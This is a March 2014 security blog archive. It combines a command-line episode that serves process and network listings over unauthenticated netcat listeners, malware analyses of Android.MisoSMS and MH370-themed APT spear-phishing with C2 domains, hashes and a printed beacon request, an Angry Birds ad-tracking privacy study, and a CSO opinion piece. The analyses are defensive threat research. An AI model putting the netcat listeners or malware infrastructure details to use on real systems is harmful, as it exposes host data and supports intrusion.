Monthly Archives: March 2014

Episode #176: Step Up to the WMIC

Tim grabs the mic:

Michael Behan writes in:

Perhaps you guys can make this one better. Haven’t put a ton of thought into it:

C:\> (echo HTTP/1.0 200 OK & wmic process list full /format:htable) | nc -l -p 3000

Then visit http://127.0.0.1:3000

This could of course be used to generate a lot more HTML reports via wmic that are quick to save from the browser. The downside is that in its current state is that the page can only be visited once. Adding something like /every:5 just pollutes the web page with mostly duplicate output.

Assuming you already have netcat (nc.exe) on the system the command above will work fine, but it will only work once. After the browser recieves the data the connection has been used and the command is done. To do this multiple times you must wrap it in an infinite For loop.

C:\> for /L %i in (1, 0, 2) do (echo HTTP/1.0 200 OK & wmic process list full /format:htable) | nc -l -p 3000

This will count from 1 to 2 and count by 0, which will never happen (except for very large values of 0). We could use the wmic command to request this information from the remote machine and view it in our browser. This method will authenticate to the remote machine instead of allowing anyone to access the information.

C:\> wmic /node:joelaptop process list full /format:htable > joelaptopprocesses.html && start joelaptopprocesses.html

This will use your current credentials to authenticate to the remote machine, request the remote process in html format, save it to a file, and finally open the file in your default viewer (likely your browser). If you need to use separate credentials you can specify /user:myusername and /password:myP@assw0rd.

Hal, your turn, and I want to see this in nice HTML format. :)

Hal throws up some jazz hands:

Wow. Tim seems a little grumpy. Maybe it's because he can make a simple web server on the command line but has no way to actually request data from it via the command line. Don't worry Little Tim, maybe someday...

Heck, maybe Tim's grumpy because of the dumb way he has to code infinite loops in CMD.EXE. This is a lot easier:

$ while :; do ps -ef | nc -l 3000; done

Frankly, most browsers will interpret this as "text/plain" by default and display the output correctly.

But the above loop got me thinking that we could actually stack multiple commands in sequence:

while :; do
ps -ef | nc -l 3000
netstat -anp | nc -l 3000
df -h | nc -l 3000
...
done

Each connection will return the output of a different command until you eventually exhaust the list and start all over again with the first command.

OK, now let's deal with grumpy Tim's request for "nice HTML format". Nothing could be easier, my friends:

$ while :; do (echo '<pre>'; ps -ef; echo '</pre>') | nc -l 3000; done

Hey, it's accepted by every major browser I tested it with! And that's the way we do it downtown... (Hal drops the mic)

Android.MisoSMS : Its Back! Now With XTEA

 

FireEye Labs recently found a more advanced variant of Android.MisoSMS, the SMS-stealing malware that we uncovered last December — yet another sign of cybercriminals’ growing interest in hijacking mobile devices for surveillance and data theft.

Like the original version of the malware, the new variant sends copies of users’ text messages to servers in China. But the newest rendition adds a few features that make it harder to detect, including a new disguise, encrypted transmissions, and command-and-control (CnC) communications that are handled natively rather than over email.

FireEye Mobile Threat Prevention customers are already protected from both variants.

 

Both variants of MisoSMS use the same names for receivers and services. While the old variant masquerades as an Android settings application, the new version presents itself as “Gplay Dsc” to the user.

The new variant also abandons SMTP email as the transport method. It now handles all CnC communication natively in C++, making it harder for an analyst to analyze the malware by disassembling its ARM code.

The newer version also hard codes specific public DNS servers such as the following:

  • resolver1.opendns.com
  • nscache.prserv.com
  • resolver1.qwest.net
  • resolver2.opendns.com
  • google-public-dns-b.google.com
  • google-public-dns-a.google.com
  • mx1.oray.net.cn
  • 183.136.132.176
  • 183.136.132.170

The new MisoSMS attempts to resolve its CnC domain name(puk[dot]nespigt[dot]iego[dot]net) from one of these DNS servers. In this way, MisoSMS stays quiet in sandbox environments, which typically use internal DNS servers and cut off access to outside networks. If the malware cannot access the hard-coded DNS servers, it does nothing and is therefore not detected.

The new MisoSMS also uses a variant of the XTEA encryption algorithm to communicate with its CnC server. The request and responses of the CnC server are structured so that the first four bytes of the request and response contain the length of the encrypted blob of data. By skipping the first four bytes, we can decrypt the communications using the key embedded in the native binary.

Figure 1 shows MisoSMS registering a newly infected device with the CnC server. The first four bytes in the encrypted payload mark the length of the message. The rest of the payload contains information about the infected device.

[caption id="attachment_5080" align="aligncenter" width="621"]New infection registration to the CnC Server Figure 1 - New Infection Registration[/caption]

Figure 2 and Figure 3 show the SMS exfiltration mechanism, as seen in Figure 1, the first four bytes of the encrypted payload contains the length indicator of the payload. The intercepted SMS message is sent to the CnC with the Device ID of the already compromised device.

[caption id="attachment_5078" align="aligncenter" width="640"]Encrypted CnC Communication containing stolen SMS Figure 2 - Encrypted CnC Communication containing stolen SMS[/caption]

[caption id="attachment_5079" align="aligncenter" width="640"]Decrypted CnC Communication containing stolen SMS Figure 3 - Decrypted CnC Communication containing stolen SMS[/caption]

The domain name of the CnC is also encrypted and stored as a byte array in the native binary. Once the encrypted byte array containing the CnC information is decrypted, the malware checks to see whether the CnC is a domain or an IP address.

That check is  meaningful. Its existence implies the ability to change the CnC information dynamically. And that ability, in turn, suggests that MisoSMS uses excerpts of publically available code.

The CnC server currently serves a Web page that resembles an Android app, as shown in Figure 4.

[caption id="attachment_5081" align="aligncenter" width="349"]CnC serving an webpage Figure 4 - CnC serving an webpage[/caption]

The Web page contains a link pointing to “hxxps://www.dropbox.com/s/t47d2nheqbhky64/%EA%B2%BD%20%EC%B0%B0%20%EC%B2%AD[dot]apk,” which is currently not available. Like the website, the MisoSMS app itself displays Korean text.

The newest version of MisoSMS suggests that cyber attackers are increasingly eyeing mobile devices — and the valuable information they store — as targets. It also serves as a vivid reminder of how crucial protecting this threat vector is in today’s mobile environment.

A Little Bird Told Me: Personal Information Sharing in Angry Birds and its Ad Libraries

Many popular mobile apps, including Rovio’s ubiquitous Angry Birds, collect and share players’ personal information much more widely than most people realize.

Some news reports have begun to scratch the surface of the situation. The New York Times reported on Angry Birds and other data-hungry apps last October. And in January, the newspaper teamed up with public-interest news site ProPublica and U.K. newspaper the Guardian for a series of stories detailing how government agencies use the game (and other mobile apps) to collect personal data. Even the long-running CBS show 60 Minutes reported earlier this month that Rovio shares users’ locations.

The Android version of Angry Birds in the Google Play store, updated on March 4, continues to share personal information. In fact, more than a quarter billion users who create Rovio accounts to save their game progress across multiple devices might be unwittingly sharing all kinds of information—age, gender, and more — with multiple parties. And many more users who play the game without a Rovio account are sharing their device information without realizing it.

Once a Rovio account is created and personal information uploaded, the user can do little to stop this personal information sharing. Their data might be in multiple locations: Angry Birds Cloud, Burstly (ad mediation platform), and third-party ad networks such as Jumptap and Millennial Media. Users can avoid sharing personal data by playing Angry Birds without Rovio account, but that won’t stop the game from sharing device information.

In this blog post, we examine the personal information Angry Birds collects. We also demonstrate the relationships between the app, the ad mediation platform, and the ad clouds — showing how the information flows among the three. We also spell out the evidence, such as network packet capture (PCap) from FireEye Mobile Threat Prevention (MTP), to support our information flow chart. Finally, we reveal how the multi-stage information sharing works by tracking the code paths from the reverse-engineered source code.

To investigate the mechanism and contents of the information sharing, we researched different versions of Angry Birds. We found that multiple versions of the game can share personal information in clear text, including email, address, age, and gender.

Angry Birds’ data management service, “ad-x.co.uk,” shares information in the penultimate version of the game (V4.0.0), which was offered in the Google Play store through March 4.  And contrary to media reports that this data sharing occurred only on an older “special edition” of the game, we found that some  sharing occurs in multiple versions of Angry Birds — including the latest to the “classic” version, 4.1.0. (This update as added to Google Play on March 4.) With more than 2 billion downloads of Angry Birds so far, this sharing affects many, many devices.

What information is shared?

Angry Birds encourages players to create Rovio accounts, touting the following benefits:

  • To save scores and in-game weapons
  • To preserve game progress across multiple devicesThe second benefit is especially attractive to devoted Angry Birds players because it allows them to stop playing on one device and pick up where they left off on another. Figure 1 shows the Rovio registration page.

     

    [caption id="attachment_4889" align="aligncenter" width="546"]Figure 1. The registration page of the Rovio account. Figure 1: Rovio’s registration page[/caption]

    Figure 2 shows birthday information collected during registration. The end-use license agreement (EULA) and privacy policy grant Rovio rights to upload the collected information to third-party entities for marketing.

    [caption id="attachment_4894" align="aligncenter" width="546"]Figure 2. The registration of the Rovio account includes personal information and EULA. Figure 2: The registration of the Rovio account includes personal information and EULA.[/caption]

    In Figure 3, the registration page asks for the user’s email address and gender.  When the player clicks the register button, Rovio uploads the collected data to the Angry Birds Cloud to create a player profile.

    [caption id="attachment_4897" align="aligncenter" width="546"]Figure 3. The personal information during the registration process. Figure 3: Rovio asks for email and gender information during registration.[/caption]

    Figure 4 shows another way Angry Birds collects personal information.  Rovio offers a newsletter to update Angry Birds players with new games, episodes, and special offers.  During newsletter signup, Rovio collects the player’s first and last name, email address, date of birth, country of residence, and gender. This information is aggregated with the user’s Rovio account profile by matching the player’s email address.

    [caption id="attachment_4899" align="aligncenter" width="546"]Figure 4. Newsletter registration page with more personal information. Figure 4: Newsletter registration page requesting more personal information[/caption]

    [caption id="attachment_5017" align="alignnone" width="549"]Figure 5. Information flow among Angry Birds, the ad intermediate platform and the ad cloud. Figure 5: Information flow among Angry Birds, the ad intermediate platform and the ad cloud[/caption]

    First, we are concerned with the type of information transmitted to the advertisement library. Figure 5 illustrates the information flow among Angry Birds, the Angry Birds Cloud, Burstly (the embedded ad library and ad mediation platform), and cloud-based ad services such as Jumptap and Millennial Media.

    Angry Birds uses Burstly as an ad adapter, which provides integration with numerous third-party ad clouds including Jumptap and Millennial Media. The ad services use players’ personal data to target ads.

    As the figure shows, Angry Birds maintains an HTTP connection with the advertising platform Burstly, the advertisement provider Millennial Media, and more.

    Traffic flow

    Table 1 summarizes the connections, which we explain in detail below.

    PCap Burstly (Ad Mediation Platform) Third Party Ad Clouds
    1 1 POST (personal information, IP) POST (personal information, IP)
    2 2 GET Ad from Jumptap GET Ad from Jumptap
    3 3 GET Ad from Turn.com GET Ad from Turn.com

    Table 1: PCap information exchanged between Angry Birds, Burstly and third-party ad clouds

    Angry Birds uses native code called libAngryBird.so to access storage and help the ad libraries store logs, caches, database, configuration files, and AES-encrypted game data. For users with a Rovio account, this data includes the user's personal information in clear text or easily decrypted formats. For example, some information is stored in clear text in the web view cache called webviewCacheChromium:

    {"accountId":"AC3XXX...XXXA62B","accountExtRef":"hE...fDc","personal":{"firstName":null,"lastName":null,"birthday":"19XXXXX-01", "age":"30", "gender":"FEMALE", "country":"United States" , "countryCode":"US", "marketingConsent":false, "avatarId":"AVXXX...XXX2c","imageAssets":[...], "nickName":null}, "abid":{"email":"eXXX...XXXe@XXX.XXX", "isConfirmed":false}, "phoneNumber":null, "facebook":{"facebookId":"","email":""},"socialNetworks":[]}

    The device is given a universal id 1XXXX8, which is stored in the webviewCookiesChromium database in clear text:

    cu1XXXX8|{"name":"cu1XXXX8","value":"3%2XXX...XXX6+PM"}|13XXX...XXX1

    The id "1XXXX8" labels the personal information when uploaded by the ad mediation platform. Then the information is passed to ad clouds.

    1. The initial traffic captures in the PCap shows what kind of information Angry Birds uploads to Burstly:

    HTTP/1.1 200 OK

    Cache-Control: private

    Date: Thu, 06 Mar 2014 XX:XX:XX GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBC #22

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 0

    Content-Length: 0

    Connection: keep-alive

    POST /Services/PubAd.svc/GetSingleAdPlacement HTTP/1.1

    Content-type: text/json; charset=utf-8

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

    Content-Length: 1690

    Host: neptune.appads.com

    Connection: Keep-Alive

    {"data":{"Id":"8XXX5","acceptLanguage":"en","adPool":0,"androidId":"u1XXX...XXXug","bundleId": "com.rovio.angrybirds",…,"cookie":[{"name":"cu1XXX8","value":"3XXX6+PM"},{"name":"vw","value":"ref=1XXX2&dgi=,eL,default,GFW"},{"name":"lc","value":"1XXX8"},{"name":"iuXXXg","value":"x"},{"name":"cuXXX8","value":"3%2XXXPM"},{"name":"fXXXg","value":"ref=1XXX712&crXXX8=2,1&crXXX8=,1"}], "crParms":"age=30,androidstore='com.android.vending', customer='googleplay', gender='FEMALE', version='4.1.0'", "debugFlags":0, "deviceId":"aXXX...XXXd", "encDevId":"xXXX....XXXs=", "encMAC":"iXXX...XXXg=", "ipAddress":"","mac":"1XXX...XXX9", "noTrack":0,"placement":"", "pubTargeting":"age=30, androidstore='com.android.vending', customer='googleplay', gender='FEMALE', version='4.1.0'","rvCR":"", "type":"iq","userAgentInfo":{"Build":"1.35.0.50370", "BuildID":"323", "Carrier":"","Density":"High", "Device":"AscendY300", "DeviceFamily":"Huawei", "MCC":"0","MNC":"0",...

    We can see the information transmitted to neptune.appads.com includes gender, age, android id, device id, mac address, device type, etc. In another PCap in which Angry Birds sends POST to the same host name, the IP address is transmitted too:

    HTTP/1.1 200 OK

    POST /Services/v1/SdkConfiguration/Get HTTP/1.1

    Host: neptune.appads.com

    ...

    IpAddress":"fXXX...XXX9%eth0",...

    According to whois records, the registrant organization of neptune.appads.com is Burstly, Inc. Therefore, the aforementioned information is actually transmitted to Burstly. It Both PCaps contain the keyword “crParms.” This keyword is also used in the source code to put personal information into a map sent as a payload.

    Skyrocket.com is an app monetization service provided by Burstly. The following PCap shows that Angry Birds retrieves the customer ID from Skyrocket.com through an HTTP GET request:

    HTTP/1.1 200 OK

    Cache-Control: private

    Content-Type: text/html

    Date: Thu, 06 Mar 2014 07:12:25 GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBA #5

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 2

    X-Stats: geo-0

    Content-Length: 9606

    Connection: keep-alive

    GET /7….4/ad/image/1...c.jpg HTTP/1.1

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

    Host: cdn.skyrocketapp.com

    Connection: Keep-Alive

    {"type":"ip","Id":"9XXX8",..."data":[{"imageUrl":"http://cdn.skyrocketapp.com/79...2c.jpg","adType":{"width":300, "height":250, "extendedProperty":80}, "dataType": 64, "textAdType":0,"destType":1,"destParms":"","cookie":[{"name":"fXXXg", "value": "ref=1XXX2&cr1XXX8=2,1&cr1XXX8=1&aoXXX8=", "path":"/", "domain": "neptune.appads.com", "expires":"Sat, 05 Apr 2014 XXX GMT", "maxage": 2…0}, {"name":"vw","value":"ref=1XXX2&...},...,"cbi":"http://bs.serving-sys.com/Burstin...25&rtu=-1","cbia":["http://bs….":1,"expires":60},..."color":{"bg":"0…0"}, "isInterstitial":1}

    2. In this PCap, the ad is fetched by including the customer id 1XXX8 into the HTTP POST request to jumptap.com, i.e. Millennial Media:

    HTTP/1.1 200 OK

    Cache-Control: private

    Content-Type: text/html

    Date: Thu, XX Mar 2014 XX:XX:XX GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBC #17

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 475

    X-Stats: geo-0;rcf88626-255;rcf75152-218

    Content-Length: 2537

    Connection: keep-alive

    GET /img/1547/1XXX2.jpg HTTP/1.1

    Host: i.jumptap.com

    Connection: keep-alive

    Referer: http://bar/

    X-Requested-With: com.rovio.angrybirds

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

    Accept-Encoding: gzip,deflate

    Accept-Language: en-US

    Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

    {"type":"ip","Id":"8XXX5","width":320,"height":50,"cookie":[],"data":[{"data":"<!-- AdPlacement : banner_ingame_burstly…","adType":{"width":320, "height":50, "extendedProperty":2064 },"dataType":1, "textAdType":0, "destType":10, "destParms":"", "cookie":[{"name":"...", "value":"ref=...&cr1XXX8=4,1&cr1XXX8=2,1", "path":"/", "domain":"neptune.appads.com", "expires":"Sat, 0X Apr 2014 0X:XX:XX GMT", "maxage":2XXX0}, {"name":"vw",..., "crid":7XXX2, "aoid":3XXX3, "iTrkData":"...", "clkData":"...","feedName":"Nexage"}]}

    In this pcap, the advertisement is retrieved from jumptap.com. We can use the same customer id “1XXXX8” to easily track the PCap of different ad libraries.

    3. For example, in another PCap from turn.com, customer id remains the same:

    HTTP/1.1 200 OK

    Cache-Control: private

    Content-Type: text/html

    Date: Thu, 06 Mar 2014 07:30:54 GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBB #6

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 273

    X-Stats: geo-0;rcf88626-272

    Content-Length: 4714

    Connection: keep-alive

    GET /server/ads.js?pub=24…

    PvctPFq&acp=0.51 HTTP/1.1

    Host: ad.turn.com

    Connection: keep-alive

    Referer: http://bar/

    Accept: */*

    X-Requested-With: com.rovio.angrybirds

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

    Accept-Encoding: gzip,deflate

    Accept-Language: en-US

    Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

    {"type":"ip","Id":"0...b","width":320,"height":50,"cookie":[],"data":[{"data":"<!-- AdPlacement : banner_ingame_burstly --> \"http://burstly.ads.nexage.com:80..." destParms":"", "cookie":[{"name":"f...g", "value":"ref=1...0&cr1XXXX8=k,1&cr...8=i, 1","path":"/", "domain":"neptune.appads.com", "expires":"Sat, 0X Apr 2014 0X:XX:XX

    How is the personal information shared?

    We also researched the source code of the Burstly (ad mediation platform) to trace the method calls for the information sharing. First in com/burstly/lib/conveniencelayer/BurstlyAnimated Banner.java, when Angry Birds tries to initialize the connection with Burstly,   initNewAnimatedBanner() is called as follows:

    this.initNewAnimatedBanner (arg7.getActivity(), arg8, arg9, arg10, arg11);

    Inside initNewAnimatedBanner(), it instantiates the BurstlyView object by calling:

    BurstlyView v0 = new BurstlyView(((Context)arg3));

    v0.setZoneId(arg6);

    Before the ZoneId is set, the initializeView() method is called in the constructor of BurstlyView. Furthermore, inside the initializeView() method, we found the following:

    new BurstlyViewConfigurator(this).configure(this.mAttributes);

    Finally in the BurstlyViewConfigurator.configure() method, it sets a series of parameters:

    this.extractAndApplyBurstlyViewId();

    this.extractAndApplyCrParams();

    this.extractAndApplyDefaultSessionLife();

    this.extractAndApplyPublisherId();

    this.extractAndApplyPubTargetingParams();

    this.extractAndApplyUseCachedResponse();

    this.extractAndApplyZoneId();

    These method calls are to retrieve information from burstly.com. For example, in the extractAndApplyCrParams() method, it retrieves parameters from burstly.com and stores them in the BurstlyView object:

    String v0 = this.mAttributes.getAttributeValue("http://burstly.com/lib/ui/schema", "crParams");

    if(v0 != null) {

    BurstlyViewConfigurator.LOG.logDebug("BurstlyViewConfigurator", "Setting CR params to: {0}", new Object[]{v0});

    this.mBurstlyView.setCrParms(v0);

    }

    The key crParms is the same one used in the first PCap to label the values corresponding to personal information such as age and gender.

    Conclusion

    In summary, Angry Birds collects user’s personal information and associates with customer id before storing it in the smart phone storage. Then the Burstly ad library embedded in Angry Birds fetches the customer id, uploads the corresponding personal information to the Burstly cloud, and transmits it to other advertising clouds. We have caught such traffics in the network packet captures and the corresponding code paths in the reversed engineered source code.

    For FireEye ThreatScore information on Angry Birds and more details about the application’s behavior, FireEye Mobile Threat Prevention customers can access their Mobile Threat Prevention (MTP) portal.

 

CIO vs CSO: Allies or Enemies


Whenever a breach occurs it reveals weaknesses in how an organization approached security.  Compromises are a great way to reveal the hidden sins organizations are committing.  In the case of the Target breach, it is a gift that keeps on giving.  While the initial breach report came out in December, it seems every week there are new “interesting” details that are revealed.  One of the more recent items is the fact that Target did not have a CSO and all security responsibilities were buried under the CIO.

The first question that people ask is whether the CIO should have been held responsible for the breach.  The bottom line is when a major event like this occurs; someone needs to be held responsible for the negligence.  Therefore it is not surprising that someone was blamed for the breach.  What was surprising is that security was a responsibility of the CIO.  The fact that a large organization did not have a separate CSO that is a peer with the CIO, is what is most concerning about the story.  Clearly many things went wrong during the breach and whoever had the responsibility of security needs to be held accountable.  However, it was not fair that the executives structured the company in this manner.  Running the IT infrastructure (typically a role of the CIO) and protecting the information (typically a role of the CSO) are two different roles and it is unfair to have one person expected to do both effectively.  These roles while at times can be complementary, they are often at odds.  Having security buried under the CIO, puts that person in a conflict of interest situation.

First and foremost, organizations of any size, especially one the size of Target needs to have an executive that is responsible for security.  With the large interdependence organizations have on a digital infrastructure, security needs to have a seat at the table in the boardroom.  If security gets buried under IT, whose primary responsibility is running a reliable infrastructure, bad decisions will be made and breaches will happen. 

Not having a CSO today is like a football team not having a quarterback.  You can have the best playbook in the world, but if you do not have someone on the field calling the plays, you are not going to win many games.  In order for organizations to be successful, they must have a reliable infrastructure and proper protection of information.  If an organization only has a CIO and no CSO, no one is focusing in on security and the results are pretty obvious.  If there is no one focusing in on security, bad things will happen.  Lack of a CSO, means lack of security.  It is almost a guarantee that Target had an amazing security team and they were screaming and yelling about all of the security issues, but there was no advocate who was listening to them and fighting their cause with the executives.  From the engineers, their needs to be a communication path to the CEO and the CSO is that channel.  Without a CSO, the proper security communication does not make it to the executives.  Therefore if the executives received the proper information about security, my guess is they would have made different decisions and this story would potentially have a happy ending.

The CIO and CSO need to be peers.  IT and security need to have equal representation in the board room, making sure the executives have accurate information.  Typically the CIO will report to the COO and the CSO will report to CFO.  The COO and CFO directly report to the executive.  However an organization decides to structure it, the CIO and CSO must have a different reporting structure.

In order for the CIO and CSO’s to have an effective working relationship, they must have clear boundaries of responsibility.  Typically what works best is for the CSO to define the proper level of security, the CIO to implement the security and the auditor to validate that the security is being done correctly.  The security that is defined by the CSO should be based off of metrics that are used as a reporting structure to the executives, so they can understand the proper level of risk to accept for the organization.  Metrics based security is key to success.  With metrics there are clear guidelines of what must be done and an easy way to measure compliance.

Organizations in this day and age must have a CSO.  Every day that passes, with more breaches becoming public, it becomes easy to convince the executives that they need a CSO.  The problem is many CIO’s do not want to have a CSO, because it is easier for them to accomplish their jobs if they control all aspects of the IT infrastructure.  Therefore the CIO will not usually lobby for a CSO.  There needs to be another advocate convincing the CEO.  The simple question to sell the CEO is “are you comfortable with the level of security at your organization and are you receiving the proper security metrics to make the decisions?”  The problem today is many CEO’s want to create a position of a CSO, but the CIO convinces them they do not need one.  While they have good intentions, it is often the CIO that lobbies against a CSO, since a CSO will cause them to give up control and potentially make their job more difficult.  For example, when a CSO comes in they often disclose all of the security problems, which show that security was not being properly addressed within the organization.

Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370

While many advanced persistent threat (APT) groups have increasingly embraced strategic Web compromise as a malware delivery vector, groups also continue to rely on spear-phishing emails that leverage popular news stories. The recent tragic disappearance of flight MH 370 is no exception. This post will examine multiple instances from different threat groups, all using spear-phishing messages and leveraging the disappearance of Flight 370 as a lure to convince the target to open a malicious attachment.

“Admin@338” Targets an APAC Government and U.S. Think Tank

The first spear phish from group “Admin@338” was sent to a foreign government in the Asian Pacific region on March 10, 2014 – just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, “Malaysian Airlines MH370.doc” (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of “decoy content” upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.

The attachment dropped a Poison Ivy variant into the path C:\DOCUME~1\admin\LOCALS~1\Temp\kav.exe (MD5: 9dbe491b7d614251e75fb19e8b1b0d0d), which, in turn, beaconed outbound to www.verizon.proxydns[.]com. This Poison Ivy variant was configured with the connection password “wwwst@Admin.” The APT group we refer to as Admin@338 has previously used Poison Ivy implants with this same password. We document the Admin@338 group’s activities in our Poison Ivy: Assessing Damage and Extracting Intelligence paper. Further, the domain www.verizon.proxydns[.]com previously resolved to the following IP addresses that have also been used by the Admin@338 group:

IP Address First Seen Last Seen
103.31.241.110 103.31.241.110 2013-08-27 2013-08-27 2013-08-28 2013-08-28
174.139.242.19 174.139.242.19 2013-08-28 2013-08-28 2013-08-31 2013-08-31
58.64.153.157 58.64.153.157 2013-09-03 2013-09-03 2014-03-07 2014-03-07
59.188.0.197 59.188.0.197 2014-03-07 2014-03-07 2014-03-19 2014-03-19

A second targeted attack attributed to the same Admin@338 group was sent to a prominent U.S.-based think tank on March 14, 2014. This spear phish contained an attachment that dropped “Malaysian Airlines MH370 5m Video.exe” (MD5: b869dc959daac3458b6a81bc006e5b97). The malware sample was crafted to appear as though it was a Flash video, by binding a Flash icon to the malicious executable.

mh3701

Interestingly, in this case, the malware sets its persistence in the normal “Run” registry location, but it tries to auto start the payload from the disk directory “c:\programdata”, which doesn’t exist until Windows 7, so a simple reboot would mitigate this threat on Windows XP. This suggests the threat actors did not perform quality control on the malware or were simply careless. We detect this implant as Backdoor.APT.WinHTTPHelper. The Admin@338 group discussed above has used variants of this same malware family in previous targeted attacks.

This specific implant beacons out to dpmc.dynssl[.]com:443 and www.dpmc.dynssl[.]com:80. The domain dpmc.dynssl[.]com resolved to the following IPs:

IP Address First Seen Last Seen
31.193.133.101 31.193.133.101 2013-11-01 2013-11-01 2013-11-29 2013-11-29
58.64.153.157 58.64.153.157 2014-01-10 2014-01-10 2014-03-08 2014-03-08
59.188.0.197 59.188.0.197 2014-03-14 2014-03-14 2014-03-17 2014-03-17
139.191.142.168 139.191.142.168 2014-03-17 2014-03-17 2014-03-19 2014-03-19

The www.dpmc.dynssl[.]com domain resolved to following IPs:

IP Address First Seen Last Seen
31.193.133.101 31.193.133.101 2013-10-30 2013-10-30 2013-11-29 2013-11-29
58.64.153.157 58.64.153.157 2014-01-10 2014-01-10 2014-03-08 2014-03-08
59.188.0.197 59.188.0.197 2014-03-14 2014-03-14 2014-03-18 2014-03-18
139.191.142.168 139.191.142.168 2014-03-17 2014-03-17 2014-03-19 2014-03-19

Note that the www.verizon.proxydns[.]com domain used by the Poison Ivy discussed above also resolved to both 58.64.153.157 and 59.188.0.197 during the same time frame as the Backdoor.APT.WinHTTPHelper command and control (CnC) located at dpmc.dynssl[.]com and www.dpmc.dynssl[.]com.

In addition to the above activity attributed to the Admin@338 group, a number of other malicious documents abusing the missing Flight 370 story were also seen in the wild. Other threat groups likely sent these other documents.

The Naikon Lures

On March 9, 2014, a malicious executable entitled the “Search for MH370 continues as report says FBI agents on way to offer assistance.pdf .exe“ (MD5: 52408bffd295b3e69e983be9bdcdd6aa) was seen circulating in the wild. This sample beacons to the CnC net.googlereader[.]pw:443. We have identified this sample, via forensic analysis, as Backdoor.APT.Naikon.

It uses a standard technique of changing its icon to make it appear to be a PDF, in order to lend to its credibility. This same icon, embedded as a PE Resource, has been used in the following recent samples:

mh3702

MD5 Import hash CnC Server
fcc59add998760b76f009b1fdfacf840 fcc59add998760b76f009b1fdfacf840 e30e07abf1633e10c2d1fbf34e9333d6 e30e07abf1633e10c2d1fbf34e9333d6 ecoh.oicp[.]net ecoh.oicp[.]net
018f762da9b51d7557062548d2b91eeb 018f762da9b51d7557062548d2b91eeb e30e07abf1633e10c2d1fbf34e9333d6 e30e07abf1633e10c2d1fbf34e9333d6 orayjue.eicp[.]net orayjue.eicp[.]net
fcc59add998760b76f009b1fdfacf840 fcc59add998760b76f009b1fdfacf840 e30e07abf1633e10c2d1fbf34e9333d6 e30e07abf1633e10c2d1fbf34e9333d6 ecoh.oicp[.]net:443 ecoh.oicp[.]net:443
498aaf6df71211f9fcb8f182a71fc1f0 498aaf6df71211f9fcb8f182a71fc1f0 a692dca39e952b61501a278ebafab97f a692dca39e952b61501a278ebafab97f xl.findmy[.]pw xl.findmy[.]pw
a093440e75ff4fef256f5a9c1106069a a093440e75ff4fef256f5a9c1106069a a692dca39e952b61501a278ebafab97f a692dca39e952b61501a278ebafab97f xl.findmy[.]pw xl.findmy[.]pw
125dbbb742399ec2c39957920867ee60 125dbbb742399ec2c39957920867ee60 a692dca39e952b61501a278ebafab97f a692dca39e952b61501a278ebafab97f uu.yahoomail[.]pw uu.yahoomail[.]pw
52408bffd295b3e69e983be9bdcdd6aa 52408bffd295b3e69e983be9bdcdd6aa a692dca39e952b61501a278ebafab97f a692dca39e952b61501a278ebafab97f net.googlereader[.]pw net.googlereader[.]pw

This malware leverages “pdfbind” to add a PDF into itself, as can be seen in the debugging strings, and when launched, the malware also presents a decoy document to the target:

mh3703

The Plat1 Lures

On March 10, 2014, we observed another sample that exploited CVE-2012-0158, titled “MH370班机可以人员身份信息.doc” (MD5: 4ff2156c74e0a36d16fa4aea29f38ff8), which roughly translates to “MH370 Flight Personnel Identity Information”. The malware that is dropped by the malicious Word document, which we detect as Trojan.APT.Plat1, begins to beacon to 59.188.253.216 via TCP over port 80. The decoy document opened after exploitation is blank. The malicious document dropped the following implants:

C:\Documents and Settings\Administrator\Application Data\Intel\ResN32.dll (MD5: 2437f6c333cf61db53b596d192cafe64)

C:\Documents and Settings\Administrator\Application Data\Intel\~y.dll (MD5: d8540b23e52892c6009fdd5812e9c597)

The implants dropped by this malicious document both included unique PDB paths that can be used to find related samples. These paths were as follows:

E:\Work\T5000\T5 Install\ResN\Release\ResN32.pdb

F:\WORK\PROJECT\T5 Install\InstDll\Release\InstDll.pdb

This malware family was also described in more detail here.

The Mongall/Saker Lures

Another sample leveraging the missing airliner theme was seen on March 12, 2014. The malicious document exploited CVE-2012-0158 and was titled, “Missing Malaysia Airlines Flight 370.doc” (MD5: 467478fa0670fa8576b21d860c1523c6). Although the extension looked like a Microsoft Office .DOC file, it was actually an .HTML Application (HTA) file. Once the exploit is successful, the payload makes itself persistent by adding a Windows shortcut (.LNK) file pointing to the malware in the “Startup” folder in the start menu. It beacons outbound to comer4s.minidns[.]net:8070. The network callback pattern, shown below, is known by researchers as “Mongall” or “Saker”:

GET /3010FC080[REDACTED] HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wis NT 5.0; .NET CLR 1.1.4322)

Host: comer4s.minidns.net:8070

Cache-Control: no-cache

The sample also drops a decoy file called “aa.doc” into the temp folder and displays the decoy content shown below:

mh3704

The “Tranchulas” Lures

